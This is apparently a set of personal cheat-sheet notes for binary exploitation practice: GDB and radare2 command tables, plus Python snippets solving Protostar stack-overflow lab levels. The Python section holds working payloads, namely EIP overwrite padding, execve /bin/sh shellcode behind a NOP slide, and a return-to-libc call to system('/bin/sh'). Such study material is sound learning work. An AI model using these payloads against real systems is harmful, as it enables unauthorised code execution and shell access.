Maddosaurus/GDB.md

## GDB.md

      
    Raw
  

              GDB.md
            
          
command
reference


disassemble func name


break *address


r args & c
run with args (< /path/to/file.txt works too) or continue


si
continue 1 step


define hook-stop -> x/24wx $esp \n w/2i $eip \n end
set up breakpoint hook


x/wx $esp+0x5x
examine content of this var


set environment varname [ = value]
set environment var with optional value


## Misc_Links.md

      
    Raw
  

              Misc_Links.md
            
          
    Malware Debugger Cheat Sheet -> via
also an Imgur Gal

  
## Python.md

      
    Raw
  

              Python.md
            
          
    python -c 'print ("A"*(4+16*3+12))+"dcba"'
As cmd argument: /path/to/bin `python -c ...`

As input: python -c (...) | /path/to/bin

As env var: export VARNAME=`python -c "print 'A'(8+163+8)+'\x0a\x0d\x0a\x0d'"`
"61626364".decode("hex") -> "dcba"
chr(0x54) -> 'T'
import struct

padding = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRR"
ebp = "XXXX"
eip = struct.pack("I", 0x080483f4)

print padding+ebp+eip
Wanna spawn a shell? A shell need input. cat provides input, if called without params (mirroring input to output).

Run the Python script with the payload (thus spawning /bin/bash), combine with cat and pipe to a binary:

(python s5.py ; cat) | /opt/protostar/bin/stack5
s5.py with payload:
import struct

padding = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS"
eip = struct.pack("I", 0xbffff7a0)
nopslide = "\x90"*100 
payload ="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"

print padding+eip+nopslide+payload
return to libc:
import struct

padding = "0000AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS"  # some padding
system = struct.pack("I", 0xb7ecffb0) # gdb -> p system
return_after_system = "AAAA"  # return address; not interesting for us atm, but system wants a return adress placed on the stack
bin_sh = struct.pack("I", 0xb7fb63bf) # strings -a -t x /lib/libc-2.11.2.so | grep "/bin/sh", then add this to the offset libc is located at (i.e. through gdb)
print padding + system + return_after_system + bin_sh

  
## radare.md

      
    Raw
  

              radare.md
            
          
    Good r2 reference: radare2-explorations

And the freakin' long official r2 Book

Finally, a Cheatsheet


command
reference


aaa
analyze all


s sym.main
search to position


pdf [@sym.main]
print disassembly (on current pos without args)


afl
list fncs


VV
enter visual mode


V!
fancy visual mode
command	reference
disassemble func name
break *address
r args & c	run with args (< /path/to/file.txt works too) or continue
si	continue 1 step
define hook-stop -> x/24wx $esp \n w/2i $eip \n end	set up breakpoint hook
x/wx $esp+0x5x	examine content of this var
set environment varname [ = value]	set environment var with optional value
command	reference
aaa	analyze all
s sym.main	search to position
pdf [@sym.main]	print disassembly (on current pos without args)
afl	list fncs
VV	enter visual mode
V!	fancy visual mode